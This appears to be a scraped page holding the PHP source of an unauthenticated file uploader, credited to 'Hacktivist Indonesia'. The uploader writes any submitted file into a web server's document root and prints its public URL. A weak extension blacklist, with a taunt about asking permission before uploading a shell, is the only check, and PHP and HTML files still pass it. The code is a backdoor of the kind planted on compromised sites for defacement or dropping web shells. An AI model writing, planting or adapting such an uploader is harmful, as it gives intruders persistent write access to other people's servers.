Uploader by MrKaktus/AstroBOY

Note: Only html & php extension can be uploaded!!!



"; $server = $_SERVER["DOCUMENT_ROOT"]; $file = $_FILES["index"]["name"]; $tipe = pathinfo($file, PATHINFO_EXTENSION); // Kalo Mau Nambahin Tipe Aksesnya Tambahin Ae if( ($tipe === "phtml") or ($tipe === "PHTML") or ($tipe === "PHtml") or ($tipe === "pHtML") or ($tipe === "PhTmL") or ($tipe === "php.fla") or ($tipe === "php.jpg") or ($tipe === "php.jpeg") or ($tipe === "php.png") or ($tipe === "php.html.php") or ($tipe === "html.php") or ($tipe === "htm.php") or ($tipe === "php.aspx") or ($tipe === "php.xxx.php") or ($tipe === "fla") or ($tipe === "php.fla") or ($tipe === "aspx") or ($tipe === "phpp") or ($tipe === "png") or ($tipe === "aspx") or ($tipe === "txt") or ($tipe === "shtml") or ($tipe === "php4") or ($tipe === "pdf") or ($tipe === "php3") or ($tipe === "PhP") or ($tipe === "pHp") or ($tipe === "xxxjpg") or ($tipe === "pHtMl") or ($tipe === "asp") or ($tipe === "sql") or ($tipe === "xml")){ echo "

MAU Upload Shell ? IZIN DULU :) >>> CHAT ME
"; exit; }else{ $upload = $server."/".$file; if(isset($_POST["up"])){ if(is_writable($server)){ if(@copy($_FILES["index"]["tmp_name"], $upload)){ $web = "http://".$_SERVER["HTTP_HOST"]."/"; echo "

SUCCESS UPLOAD : $web$file
"; }else{ echo "

GAGAL UPLOAD Slur:v
"; } } } } ?>

© Hacktivist Indonesia